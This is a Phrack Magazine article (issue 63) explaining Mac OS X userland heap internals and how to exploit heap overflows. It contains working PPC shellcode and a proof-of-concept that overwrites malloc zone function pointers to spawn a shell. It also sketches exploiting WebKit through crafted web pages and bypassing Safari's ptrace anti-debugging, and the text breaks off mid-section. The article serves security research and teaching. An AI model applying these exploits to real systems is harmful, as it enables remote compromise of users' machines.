.:: Phrack Magazine ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ] [ 71 ]
Get tar.gz
Current issue : #63 | Release date : 2005-01-08 | Editor : Phrack Staff
Introduction	Phrack Staff
Loopback	Phrack Staff
Linenoise	Phrack Staff
Phrack Prophile on Tiago	Phrack Staff
OSX heap exploitation techniques	Nemo
Hacking Windows CE (pocketpcs & others)	San
Games with kernel Memory...FreeBSD Style	jkong
Raising The Bar For Windows Rootkit Detection	sherri sparks & jamie butler
Embedded ELF Debugging	ELFsh crew
Hacking Grub for Fun & Profit	coolq
Advanced antiforensics : SELF	ripe & pluf
Process Dump and Binary Reconstruction	ilo
Next-Gen. Runtime Binary Encryption	zvrba
Shifting the Stack Pointer	andrewg
NT Shellcode Prevention Demystified	piotr
PowerPC Cracking on OSX with GDB	curious
Hacking with Embedded Systems	cawan
Process Hiding & The Linux Scheduler	ubra
Breaking Through a Firewall	kotkrye
Phrack World News	Phrack Staff
Title : OSX heap exploitation techniques
Author : Nemo
                           ==Phrack Inc.==

              Volume 0x0b, Issue 0x3f, Phile #0x05 of 0x14


|=---------------=[ OS X heap exploitation techniques  ]=---------------=|
|=----------------------------------------------------------------------=|
|=------------------=[ nemo <[email protected]> ]=------------------=|

--[ Table of contents

  1 - Introduction
  2 - Overview of the Apple OS X userland heap implementation 
    2.1 - Environment Variables
    2.2 - Zones
    2.3 - Blocks
    2.4 - Heap initialization 
  3 - A sample overflow 
  4 - A real life example (WebKit)
  5 - Miscellaneous
    5.1 - Wrap-around Bug
    5.2 - Double free()'s
    5.3 - Beating ptrace()
  6 - Conclusion
  7 - References

--[ 1 - Introduction.

This article comes as a result of my experiences exploiting a heap 
overflow in the default web browser (Safari) on Mac OS X. It assumes a 
small amount of knowledge of PPC assembly. A reference for this has
been provided in the references section below. (4). Also, knowledge of 
other memory allocators will come in useful, however it's not necessarily
needed. All code in this paper was compiled and tested on Mac OS X - 
Tiger (10.4) running on PPC32 (power pc) architecture.

--[ 2 - Overview of the Apple OS X userland heap implementation.

The malloc() implementation found in Apple's Libc-391 and earlier (at the
time of writing this) is written by Bertrand Serlet. It is a relatively 
complex memory allocator made up of memory "zones", which are variable 
size portions of virtual memory, and "blocks", which are allocated from 
within these zones. It is possible to have multiple zones, however most 
applications tend to stick to just using the default zone. 

So far this memory allocator is used in all releases of OS X so far. It 
is also used by the Open Darwin project [8] on x86 architecture, however 
this isn't covered in the paper. 

The source for the implementation of the Apple malloc() is available from
[6]. (The current version of the source at the time of writing this is 
10.4.1).

To access it you need to be a member of the ADC, which is free to sign up.
(or if you can't be bothered signing up use the login/password from 
Bug Me Not [7]  ;)

----[ 2.1 - Environment Variables.

A series of environment variables can be set, to modify the behavior of
the memory allocation functions. These can be seen by setting the 
"MallocHelp" variable, and then calling the malloc() function. They are 
also shown in the malloc() manpage. 

We will now look at the variables which are of the most use to us when 
exploiting an overflow.

[ MallocStackLogging ] -:-  When this variable is set a record is kept of
all the malloc operations that occur. With this variable set the "leaks" 
tool can be used to search a processes memory for malloc()'ed buffers 
which are unreferenced.

[ MallocStackLoggingNoCompact ] -:- When this variable is set, the record
of malloc operation is kept in a manner in which the "malloc_history" 
tool is able to parse. The malloc_history tool is used to list the 
allocations and deallocations which have been performed by the process.

[ MallocPreScribble ] -:- This environment variable, can be used to fill 
memory which has been allocated with 0xaa. This can be useful to easily 
see where buffers are located in memory. It can also be useful when 
scripting gdb to investigate the heap.

[ MallocScribble ] -:-  This variable is used to fill de-allocated 
memory with 0x55. This, like MallocPreScribble is useful for 
making it easier to inspect the memory layout. Also this will make 
a program more likely to crash when it's accessing data it's not supposed
to.

[ MallocBadFreeAbort ] -:- This variable causes a SIGABRT to be sent to 
the program when a pointer is passed to free() which is not listed as 
allocated. This can be useful to halt execution at the exact point an 
error occurred in order to assess what has happened.

NOTE: The "heap" tool can be used to inspect the current heap of a 
process the Zones are displayed as well as any objects which are 
currently allocated. This tool can be used without setting an 
environment variable.

----[ 2.2 - Zones.

A single zone can be thought of a single heap. When the zone is destroyed
all the blocks allocated within it are free()'ed. Zones allow blocks with 
similar attributes to be placed together. The zone itself is described by
a malloc_zone_t struct (defined in /usr/include/malloc.h) which is shown 
below:

 [malloc_zone_t struct]

typedef struct _malloc_zone_t {

    /* Only zone implementors should depend on the layout of this 
    structure; Regular callers should use the access functions below */
    void        *reserved1;     /* RESERVED FOR CFAllocator DO NOT USE */
    void        *reserved2;     /* RESERVED FOR CFAllocator DO NOT USE */
    size_t      (*size)(struct _malloc_zone_t *zone, const void *ptr); 
    void        *(*malloc)(struct _malloc_zone_t *zone, size_t size);
    void        *(*calloc)(struct _malloc_zone_t *zone, size_t num_items, 
		           size_t size); 
    void        *(*valloc)(struct _malloc_zone_t *zone, size_t size); 
    void        (*free)(struct _malloc_zone_t *zone, void *ptr);
    void        *(*realloc)(struct _malloc_zone_t *zone, void *ptr, 
							size_t size);
    void        (*destroy)(struct _malloc_zone_t *zone); 
    const char  *zone_name;

    /* Optional batch callbacks; these may be NULL */
    unsigned    (*batch_malloc)(struct _malloc_zone_t *zone, size_t size, 
				void **results, unsigned num_requested); 
    void        (*batch_free)(struct _malloc_zone_t *zone, 
			void **to_be_freed, unsigned num_to_be_freed); 
    struct malloc_introspection_t       *introspect;
    unsigned    version;
} malloc_zone_t;

(Well, technically zones are scalable szone_t structs, however the first 
element of a szone_t struct consists of a malloc_zone_t struct. This 
struct is the most important for us to be familiar with to exploit heap 
bugs using the method shown in this paper.)

As you can see, the zone struct contains function pointers for each of the
memory allocation / deallocation functions. This should give you a 
pretty good idea of how we can control execution after an overflow.

Most of these functions are pretty self explanatory, the malloc,calloc,
valloc free, and realloc function pointers perform the same 
functionality they do on Linux/BSD. 

The size function is used to return the size of the memory allocated. The 
destroy() function is used to destroy the entire zone and free all memory
allocated in it. 

The batch_malloc and batch_free functions to the best of my understanding
are used to allocate (or deallocate) several blocks of the same size. 

NOTE:
The malloc_good_size() function is used to return the size of the buffer
after rounding has occurred. An interesting note about this function is 
that it contains the same wrap mentioned in  5.1.

	printf("0x%x\n",malloc_good_size(0xffffffff));

Will print 0x1000 on Mac OS X 10.4 (Tiger).
	
----[ 2.3 - Blocks. 

Allocation of blocks occurs in different ways depending on the size of the
memory required. The size of all blocks allocated is always paragraph 
aligned (a multiple of 16). Therefore an allocation of less than 16 will 
always return 16, an allocation of 20 will return 32, etc. 

The szone_t struct contains two pointers, for tiny and small block 
allocation. These are shown below:

	tiny_region_t       *tiny_regions;
	small_region_t      *small_regions;

Memory allocations which are less than around 500 bytes in size
fall into the "tiny" range. These allocations are allocated from a  
pool of vm_allocate()'ed regions of memory. Each of these regions 
consists of a 1MB, (in 32-bit mode), or 2MB, (in 64-bit mode) heap. 
Following this is some meta-data about the region. Regions are ordered 
by ascending block size. When memory is deallocated it is added back to 
the pool. 


Free blocks contain the following meta-data: 

(all fields are sizeof(void *) in size, except for "size" which is 
sizeof(u_short)). Tiny sized buffers are instead aligned to 0x10 bytes)

- checksum
- previous
- next
- size 

The size field contains the quantum count for the region. A quantum represents 
the size of the allocated blocks of memory within the region.

Allocations of which size falls in the range between 500 bytes and four 
virtual pages in size (0x4000) fall into the "small" category.
Memory allocations of "small" range sized blocks, are allocated from a 
pool of small regions, pointed to by the "small_regions" pointer in the 
szone_t struct. Again this memory is pre-allocated with the vm_allocate()
function. Each "small" region consists of an 8MB heap, followed by the 
same meta-data as tiny regions.

Tiny and small allocations are not always guaranteed to be page aligned.
If a block is allocated which is less than a single virtual page size then
obviously the block cannot be aligned to a page. 

Large block allocations (allocations over four vm pages in size), are 
handled quite differently to the small and tiny blocks. When a large
block is requested, the malloc() routine uses vm_allocate() to obtain the 
memory required. Larger memory allocations occur in the higher memory of
the heap. This is useful in the "destroying the heap" technique, outlined 
in this paper. Large blocks of memory are allocated in multiples of 4096. 
This is the size of a virtual memory page. Because of this, large memory
allocations are always guaranteed to be page-aligned.

----[ 2.4 - Heap initialization. 

As you can see below, the malloc() function is merely a wrapper around
the malloc_zone_malloc() function. 

 void *malloc(size_t size) 
 {
   void  *retval;
	    
   retval = malloc_zone_malloc(inline_malloc_default_zone(), size);
   if (retval == NULL) 
     {
	errno = ENOMEM;
     }
   return retval;
 }
 
It uses the inline_malloc_default_zone() function to pass the appropriate
zone to malloc_zone_malloc(). If malloc() is being called for the first 
time the inline_malloc_default_zone() function calls _malloc_initialize()
in order to create the initial default malloc zone. 

The malloc_create_zone() function is called with the values (0,0) being 
passed in as as the start_size and flags parameters. 

After this the environment variables are read in (any beginning with 
"Malloc"), and parsed in order to set the appropriate flags.  

It then calls the create_scalable_zone() function in the scalable_malloc.c 
file. This function is really responsible for creating the szone_t struct.
It uses the allocate_pages() function as shown below.

 szone = allocate_pages(NULL, SMALL_REGION_SIZE, SMALL_BLOCKS_ALIGN, 0, \ 
			VM_MAKE_TAG(VM_MEMORY_MALLOC));

This, in turn, uses the mach_vm_allocate() mach syscall to allocate the 
required memory to store the s_zone_t default struct. 

-[Summary]:

For the technique contained within this paper, the most important things 
to note is that a szone_t struct is set up in memory. The struct contains 
several function pointers which are used to store the address of each of 
the appropriate allocation and deallocation functions. When a block of 
memory is allocated which falls into the "large" category, the 
vm_allocate() mach syscall is used to allocate the memory for this. 

--[ 3 - A Sample Overflow

Before we look at how to exploit a heap overflow, we will first analyze
how the initial zone struct is laid out in the memory of a running 
process.

To do this we will use gdb to debug a small sample program. This is 
shown below:

	-[nemo@gir:~]$ cat > mtst1.c
	#include <stdlib.h>

	int main(int ac, char **av)
	{
		char *a = malloc(10);
		__asm("trap");
		char *b = malloc(10);
	}

	-[nemo@gir:~]$ gcc mtst1.c -o mtst1
	-[nemo@gir:~]$ gdb ./mtst1
	GNU gdb 6.1-20040303 (Apple version gdb-413)
	(gdb) r
	Starting program: /Users/nemo/mtst1 
	Reading symbols for shared libraries . done

Once we receive a SIGTRAP signal and return to the gdb command shell we
can then use the command shown below to locate our initial szone_t 
structure in the process memory. 

	(gdb) x/x &initial_malloc_zones
	0xa0010414 <initial_malloc_zones>:      0x01800000

This value, as expected inside gdb, is shown to be 0x01800000. 
If we dump memory at this location, we can see each of the fields in the 
_malloc_zone_t_ struct as expected.

NOTE: Output reformatted for more clarity. 

	(gdb) x/x (long*) initial_malloc_zones
	0x1800000:      0x00000000	// Reserved1.
	0x1800004:      0x00000000	// Reserved2.
	0x1800008:      0x90005e0c	// size() pointer.
	0x180000c:      0x90003abc	// malloc() pointer.
	0x1800010:      0x90008bc4	// calloc() pointer.
	0x1800014:      0x9004a9f8	// valloc() pointer.
	0x1800018:      0x900060ac	// free() pointer.
	0x180001c:      0x90017f90	// realloc() pointer.
	0x1800020:      0x9010efb8	// destroy() pointer.
	0x1800024:      0x00300000	// Zone Name 
					//("DefaultMallocZone").
	0x1800028:      0x9010dbe8	// batch_malloc() pointer.
	0x180002c:      0x9010e848	// batch_free() pointer.

In this struct we can see each of the function pointers which are called 
for each of the memory allocation/deallocation functions performed using
the default zone. As well as a pointer to the name of the zone, which can
be useful for debugging.

If we change the malloc() function pointer, and continue our sample 
program (shown below) we can see that the second call to malloc() results 
in a jump to the specified value. (after instruction alignment).

	(gdb) set *0x180000c = 0xdeadbeef
	(gdb) jump *($pc + 4)
	Continuing at 0x2cf8.

	Program received signal EXC_BAD_ACCESS, Could not access memory.
	Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec
	0xdeadbeec in ?? ()
	(gdb) 

But is it really feasible to write all the way to the address 0x1800000?
(or 0x2800000 outside of gdb). We will look into this now.

First we will check the addresses various sized memory allocations are 
given. The location of each buffer is dependant on whether the 
allocation size falls into one of the various sized bins mentioned 
earlier (tiny, small or large).

To test the location of each of these we can simply compile and run the 
following small c program as shown:

	-[nemo@gir:~]$ cat > mtst2.c    
	#include <stdio.h>
	#include <stdlib.h>

	int main(int ac, char **av)
	{
		extern *malloc_zones;

		printf("initial_malloc_zones @ 0x%x\n",*malloc_zones);
		printf("tiny:  %p\n",malloc(22));
		printf("small: %p\n",malloc(500));
		printf("large: %p\n",malloc(0xffffffff));
		return 0;
	}
	-[nemo@gir:~]$ gcc mtst2.c -o mtst2
	-[nemo@gir:~]$ ./mtst2 
	initial_malloc_zones @ 0x2800000
	tiny:  0x500160
	small: 0x2800600
	large: 0x26000

From the output of this program we can see that it is only possible to 
write to the initial_malloc_zones struct from a "tiny" or " large" 
buffer. Also, in order to overwrite the function pointers contained within
this struct we need to write a considerable amount of data completely 
destroying sections of the zone. Thankfully many situations exist in 
typical software which allow these criteria to be met. This is discussed
in the final section of this paper.

Now we understand the layout of the heap a little better, we can use a 
small sample program to overwrite the function pointers contained in the 
struct to get a shell. 

The following program allocates a 'tiny' buffer of 22 bytes. It then uses
memset() to write 'A's all the way to the pointer for malloc() in the 
zone struct, before calling malloc().

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int ac, char **av)
{
  extern *malloc_zones;
  char *tmp,*tinyp = malloc(22);

  printf("[+] tinyp is @ %p\n",tinyp);
  printf("[+] initial_malloc_zones is @ %p\n", *malloc_zones);			
  printf("[+] Copying 0x%x bytes.\n",
	  (((char *)*malloc_zones + 16) - (char *)tinyp));
  memset(tinyp,'A', (int)(((char *)*malloc_zones + 16) - (char *)tinyp));

  tmp = malloc(0xdeadbeef);
  return 0;
}

However when we compile and run this program, an EXC_BAD_ACCESS signal is 
received.

	(gdb) r
	Starting program: /Users/nemo/mtst3 
	Reading symbols for shared libraries . done
	[+] tinyp is @ 0x300120
	[+] initial_malloc_zones is @ 0x1800000
	[+] Copying 0x14ffef0 bytes.

	Program received signal EXC_BAD_ACCESS, Could not access memory.
	Reason: KERN_INVALID_ADDRESS at address: 0x00405000
	0xffff9068 in ___memset_pattern () 

This is due to the fact that, in between the tinyp pointer and the malloc
function pointer we are trying to overwrite there is some unmapped memory. 

In order to get past this we can use the fact that blocks of memory 
allocated which fall into the "large" category are allocated using the 
mach vm_allocate() syscall. 

If we can get enough memory to be allocated in the large classification,
before the overflow occurs we should have a clear path to the pointer.

To illustrate this point, we can use the following code:

#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
#include <string.h>

char shellcode[] = // Shellcode by b-r00t, modified by nemo.
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4"
"\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60"
"\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"
"\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68";

extern *malloc_zones;

int    main(int ac, char **av)
{
 char  *tmp, *tmpr;
 int   a=0 , *addr;

 while ((tmpr = malloc(0xffffffff)) <= (char *)*malloc_zones);
				
 // small buffer
 addr = malloc(22);              
 printf("[+] malloc_zones (first zone) @ 0x%x\n", *malloc_zones);
 printf("[+] addr @ 0x%x\n",addr);

 if ((unsigned int) addr < *malloc_zones) 
 {
    printf("[+] addr + %u = 0x%x\n",
	   *malloc_zones - (int) addr, *malloc_zones);
    exit(1);
 }

 printf("[+] Using shellcode @ 0x%x\n",&shellcode);

 for (a = 0; 
      a <= ((*malloc_zones - (int) addr) + sizeof(malloc_zone_t)) / 4;
      a++)
   addr[a] = (int) &shellcode[0];

 printf("[+] finished memcpy()\n");
 
 tmp = malloc(5);        // execve()

}

This code allocates enough "large" blocks of memory (0xffffffff) with 
which to plow a clear path to the function pointers. It then copies 
the address of the shellcode into memory all the way through the zone
before overwriting the function pointers in the szone_t struct. Finally a
call to malloc() is made in order to trigger the execution of the 
shellcode.

As you can see below, this code function as we'd expect and our 
shellcode is executed.

	-[nemo@gir:~]$ ./heaptst 
	[+] malloc_zones (first zone) @ 0x2800000
	[+] addr @ 0x500120
	[+] addr + 36699872 = 0x2800000
	[+] Using shellcode @ 0x3014
	[+] finished memcpy()
	sh-2.05b$ 

This method has been tested on Apple's OS X version 10.4.1 (Tiger).

--[ 4 - A Real Life Example

The default web browser on OS X (Safari) as well as the mail client 
(Mail.app), Dashboard and almost every other application on OS X which 
requires web parsing functionality achieve this through a library 
which Apple call "WebKit". (2)

This library contains many bugs, many of which are exploitable using this
technique. Particular attention should be payed to the code which renders 
<TABLE></TABLE> blocks ;) 

Due to the nature of HTML pages an attacker is presented with 
opportunities to control the heap in a variety of ways before actually 
triggering the exploit. In order to use the technique described in this
paper to exploit these bugs we can craft some HTML code, or an image 
file, to perform many large allocations and therefore cleaving a path 
to our function pointers. We can then trigger one of the numerous 
overflows to write the address of our shellcode into the function 
pointers before waiting for a shell to be spawned.

One of the bugs which i have exploited using this particular method 
involves an unchecked length being used to allocate and fill an object in
memory with null bytes (\x00). 

If we manage to calculate the write so that it stops mid way through one 
of our function pointers in the szone_t struct, we can effectively 
truncate the pointer causing execution to jump elsewhere.

The first step to exploiting this bug, is to fire up the debugger (gdb)
and look at what options are available to us.

Once we have Safari loaded up in our debugger, the first thing we need
to check for the exploit to succeed is that we have a clear path to the 
initial_malloc_zones struct. To do this in gdb we can put a breakpoint 
on the return statement in the malloc() function. 

We use the command "disas malloc" to view the assembly listing for the 
malloc function. The end of this listing is shown below:

	.....

	0x900039dc <malloc+1464>:       lwz     r0,8(r1)
	0x900039e0 <malloc+1468>:       lmw     r24,-32(r1)
	0x900039e4 <malloc+1472>:       lwz     r11,4(r1)
	0x900039e8 <malloc+1476>:       mtlr    r0
	0x900039ec <malloc+1480>:       .long 0x7d708120
	0x900039f0 <malloc+1484>:       blr
	0x900039f4 <malloc+1488>:       .long 0x0

The "blr" instruction shown at line 0x900039f0 is the "branch to link 
register" instruction. This instruction is used to return from malloc().

Functions in OS X on PPC architecture pass their return value back to the 
calling function in the "r3" register. In order to make sure that the 
malloc()'ed addresses have reached the address of our zone struct we can 
put a breakpoint on this instruction, and output the value which was 
returned.

We can do this with the gdb commands shown below.

	(gdb) break *0x900039f0 
	Breakpoint 1 at 0x900039f0
	(gdb) commands
	Type commands for when breakpoint 1 is hit, one per line.
	End with a line saying just "end".
	>i r r3
	>cont
	>end

We can now continue execution and receive a running status of all 
allocations which occur in our program. This way we can see when our 
target is reached.

The "heap" tool can also be used to see the sizes and numbers of each
allocation.

There are several methods which can be used to set up the heap 
correctly for exploitation. One method, suggested by andrewg, is to use a
.png image in order to control the sizes of allocations which occur. 
Apparently this method was learn from zen-parse when exploiting a 
mozilla bug in the past.

The method which i have used is to create an HTML page which repeatedly
triggers the overflow with various sizes. After playing around with 
this for a while, it was possible to regularly allocate enough memory 
for the overflow to occur.

Once the limit is reached, it is possible to trigger the overflow in a
way which overwrites the first few bytes in any of the pointers in the 
szone_t struct. 

Because of the big endian nature of PPC architecture (by default. it can 
be changed.) the first few bytes in the pointer make all the difference 
and our truncated pointer will now point to the .TEXT segment. 

The following gdb output shows our initial_malloc_zones struct after the 
heap has been smashed.

	(gdb) x/x (long )*&initial_malloc_zones
	0x1800000:      0x00000000	// Reserved1.
	(gdb)
	0x1800004:      0x00000000	// Reserved2.
	(gdb)
	0x1800008:      0x00000000	// size() pointer.
	(gdb)
	0x180000c:      0x00003abc	// malloc() pointer.
	(gdb)		   ^^ smash stopped here.
	0x1800010:      0x90008bc4

As you can see, the malloc() pointer is now pointing to somewhere in the
.TEXT segment, and the next call to malloc() will take us there. We can 
use gdb to view the instructions at this address. As you can see in the 
following example.

	(gdb) x/2i 0x00003abc
	0x3abc: lwz     r4,0(r31)
	0x3ac0: bl      0xd686c <dyld_stub_objc_msgSend>

Here we can see that the r31 register must be a valid memory address for 
a start following this the dyld_stub_objc_msgSend() function is called 
using the "bl" (branch updating link register) instruction. Again we can 
use gdb to view the instructions in this function.

	(gdb) x/4i 0xd686c
	0xd686c <dyld_stub_objc_msgSend>:       lis     r11,14
	0xd6870 <dyld_stub_objc_msgSend+4>:     lwzu    r12,-31732(r11)
	0xd6874 <dyld_stub_objc_msgSend+8>:     mtctr   r12
	0xd6878 <dyld_stub_objc_msgSend+12>:    bctr

We can see in these instructions that the r11 register must be a valid
memory address. Other than that the final two instructions (0xd6874 
and 0xd6878) move the value in the r12 register to the control 
register, before branching to it. This is the equivalent of jumping to 
a function pointer in r12. Amazingly this code construct is exactly 
what we need. 

So all that is needed to exploit this vulnerability now, is to find 
somewhere in the binary where the r12 register is controlled by the user,
directly before the malloc function is called. Although this isn't 
terribly easy to find, it does exist.

However, if this code is not reached before one of the pointers 
contained on the (now smashed) heap is used the program will most 
likely crash before we are given a chance to steal execution flow. Because
of this fact, and because of the difficult nature of predicting the exact 
values with which to smash the heap, exploiting this vulnerability can be 
very unreliable, however it definitely can be done.

	Program received signal EXC_BAD_ACCESS, Could not access memory.
	Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec
	0xdeadbeec in ?? ()
	(gdb)

An exploit for this vulnerability means that a crafted email or website 
is all that is needed to remotely exploit an OS X user.

Apple have been contacted about a couple of these bugs and are currently
in the process of fixing them.

The WebKit library is open source and available for download, apparently 
it won't be too long before Nokia phones use this library for their web 
applications. [5]

--[ 5 - Miscellaneous

This section shows a couple of situations / observations regarding the 
memory allocator which did not fit in to any of the other sections.

----[ 5.1 - Wrap-around Bug.

The examples in this paper allocated the value 0xffffffff. However 
this amount is not technically feasible for a malloc implementation 
to allocate each time.

The reason this works without failure is due to a subtle bug which 
exists in the Darwin kernel's vm_allocate() function.

This function attempts to round the desired size it up to the closest 
page aligned value. However it accomplishes this by using the 
vm_map_round_page() macro (shown below.)

	#define PAGE_MASK (PAGE_SIZE - 1)
	#define PAGE_SIZE vm_page_size
	#define vm_map_round_page(x) (((vm_map_offset_t)(x) + \ 
	PAGE_MASK) & ~((signed)PAGE_MASK))

Here we can see that the page size minus one is simply added to the value 
which is to be rounded before being bitwise AND'ed with the reverse of
the PAGE_MASK.

The effect of this macro when rounding large  values can be illustrated 
using the following code:

	#include <stdio.h>

	#define PAGEMASK 0xfff

	#define vm_map_round_page(x) ((x + PAGEMASK) & ~PAGEMASK)

	int main(int ac, char **av)
	{
		printf("0x%x\n",vm_map_round_page(0xffffffff));
	}

When run (below) it can be seen that the value 0xffffffff will be rounded
to 0.
	-[nemo@gir:~]$ ./rounding
	0x0

Directly below the rounding in vm_allocate() is performed there is a check
to make sure the rounded size is not zero. If it is zero then the size of
a page is added to it. Leaving only a single page allocated.

        map_size = vm_map_round_page(size);              
	if (map_addr == 0)
		map_addr += PAGE_SIZE;

The code below demonstrates the effect of this on two calls to malloc().

	#include <stdio.h>
	#include <stdlib.h>

	int main(int ac, char **av)
	{
		char *a = malloc(0xffffffff);
		char *b = malloc(0xffffffff);

		printf("B - A: 0x%x\n", b - a);

		return 0;
	}

When this program is compiled and run (below) we can see that although the
programmer believes he/she now has a 4GB buffer only a single page has
been allocated.

	-[nemo@gir:~]$ ./ovrflw
	B - A: 0x1000

This means that most situations where a user specified length can be 
passed to the malloc() function, before being used to copy data, are 
exploitable.

This bug was pointed out to me by duke.

----[ 5.2 - Double free().

Bertrand's allocator keeps track of the addresses which are currently
allocated. When a buffer is free()'ed the find_registered_zone() function
is used to make sure that the address which is requested to be free()'ed 
exists in one of the zones. This check is shown below.

void		free(void *ptr) 
{
 malloc_zone_t       *zone;

 if (!ptr) return;
 
 zone = find_registered_zone(ptr, NULL);
 if (zone) 
  {
     malloc_zone_free(zone, ptr);
  } 
  else 
  {
     malloc_printf("***  Deallocation of a pointer not malloced: %p; "
                   "This could be a double free(), or free() called "
		   "with the middle of an allocated block; "
		   "Try setting environment variable MallocHelp to see "
		   "tools that help to debug\n", ptr);
     if (malloc_free_abort) abort();
  }
}


This means that an address free()'ed twice (double free) will not 
actually be free()'ed the second time. Making it hard to exploit 
double free()'s in this way.

However, when a buffer is allocated of the same size as the previous 
buffer and free()'ed, but the pointer to the free()'ed buffer still 
exists and is used an exploitable condition can occur.

The small sample program below shows a pointer being allocated and 
free()ed and then a second pointer being allocated of the same size. Then
free()ed twice.

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>

	int main(int ac, char **av)
	{
		char *b,*a  = malloc(11);

		printf("a: %p\n",a);
		free(a);
		b  = malloc(11);
		printf("b: %p\n",b);
		free(b);
		printf("b: %p\n",a);
		free(b);
		printf("a: %p\n",a);

		return 0;
	}


When we compile and run it, as shown below, we can see that pointer "a"
still points to the same address as "b", even after it was free()'ed. 
If this condition occurs and we are able to write to,or read from,
pointer "a", we may be able to exploit this for an info leak, or gain
control of execution.

	-[nemo@gir:~]$ ./dfr
	a: 0x500120
	b: 0x500120
	b: 0x500120
	tst(3575) malloc: *** error for object 0x500120: double free
	tst(3575) malloc: *** set a breakpoint in szone_error to debug
	a: 0x500120

I have written a small sample program to explain more clearly how this 
works. The code below reads a username and password from the user.
It then compares password to one stored in the file ".skrt". If this 
password is the same, the secret code is revealed. Otherwise an error is
printed informing the user that the password was incorrect.

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>

	#define PASSWDFILE ".skrt"

	int main(int ac, char **av)
	{
		char *user = malloc(128 + 1);
		char *p,*pass = "" ,*skrt = NULL;
		FILE *fp;

		printf("login: ");
		fgets(user,128,stdin);
		if (p = strchr(user,'\n'))
			*p = '\x00';

		// If the username contains "admin_", exit.
		if(strstr(user,"admin_")) 
		{
			printf("Admin user not allowed!\n");
			free(user);
			fflush(stdin);
			goto exit;
		}

		pass = getpass("Enter your password: ");

	exit:
		if ((fp = fopen(PASSWDFILE,"r")) == NULL) 
		{
			printf("Error loading password file.\n");
			exit(1);
		}

		skrt = malloc(128 + 1);

		if (!fgets(skrt,128,fp)) 
		{
			exit(1);
		}

		if (p = strchr(skrt,'\n'))
			*p = '\x00';

		if (!strcmp(pass,skrt)) 
		{
			printf("The combination is 2C,4B,5C\n");
		} 
		else 
		{
			printf("Password Rejected for %s, please try again\n");
				user);
		}

		fclose(fp);
		return 0;
	}

When we compile the program and enter an incorrect password we see the 
following message:

	-[nemo@gir:~]$ ./dfree
	login: nemo
	Enter your password:
	Password Rejected for nemo, please try again.

However, if the "admin_" string is detected  in the string, the user 
buffer is free()'ed. The skrt buffer is then returned from malloc() 
pointing to the same allocated block of memory as the user pointer. 
This would normally be fine however the user buffer is used in the 
printf() function call at the end of the function. Because the user 
pointer still points to the same memory as skrt this causes an 
info-leak and the secret password is printed, as seen below:

	-[nemo@gir:~]$ ./dfree
	login: admin_nemo
	Admin user not allowed!
	Password Rejected for secret_password, please try again.

We can then use this password to get the combination:

	-[nemo@gir:~]$ ./dfree
	login: nemo
	Enter your password:
	The combination is 2C,4B,5C

----[ 5.3 - Beating ptrace()

Safari uses the ptrace() syscall to try and stop evil hackers from 
debugging their proprietary code. ;). The extract from the 
man-page below shows a ptrace() flag which can be used to stop people 
being able to debug your code.

PT_DENY_ATTACH
	   This request is the other operation used by the traced
	   process; it allows a process that is not currently being
	   traced to deny future traces by its parent.  All other
	   arguments are ignored.  If the process is currently being
	   traced, it will exit with the exit status of ENOTSUP; oth-
	   erwise, it sets a flag that denies future traces.  An
	   attempt by the parent to trace a process which has set this
	   flag will result in a segmentation violation in the parent.

There are a couple of ways to get around this check (which i am aware of).
The first of these is to patch your kernel to stop the PT_DENY_ATTACH call
from doing anything. This is probably the best way, however involves the 
most effort.

The method which we will use now to look at Safari is to start up gdb and
put a breakpoint on the ptrace() function. This is shown below:

	-[nemo@gir:~]$ gdb /Applications/Safari.app/Contents/MacOS/Safari
	GNU gdb 6.1-20040303 (Apple version gdb-413) 
	(gdb) break ptrace
	Breakpoint 1 at 0x900541f4

We then run the program, and wait until the breakpoint is hit. When our 
breakpoint is triggered, we use the x/10i $pc command (below) to view the
next 10 instructions in the function.

	(gdb) r
	Starting program: /Applications/Safari.app/Contents/MacOS/Safari
	Reading symbols for shared libraries .................... done

	Breakpoint 1, 0x900541f4 in ptrace ()
	(gdb) x/10i $pc
	0x900541f4 <ptrace+20>: addis   r8,r8,4091
	0x900541f8 <ptrace+24>: lwz     r8,7860(r8)
	0x900541fc <ptrace+28>: stw     r7,0(r8)
	0x90054200 <ptrace+32>: li      r0,26
	0x90054204 <ptrace+36>: sc
	0x90054208 <ptrace+40>: b       0x90054210 <ptrace+48>
	0x9005420c <ptrace+44>: b       0x90054230 <ptrace+80>
	0x90054210 <ptrace+48>: mflr    r0
	0x90054214 <ptrace+52>: bcl-    20,4*cr7+so,0x90054218 
	0x90054218 <ptrace+56>: mflr    r12

At line 0x90054204 we can see the instruction "sc" being executed. This 
is the instruction which calls the syscall itself. This is similar to 
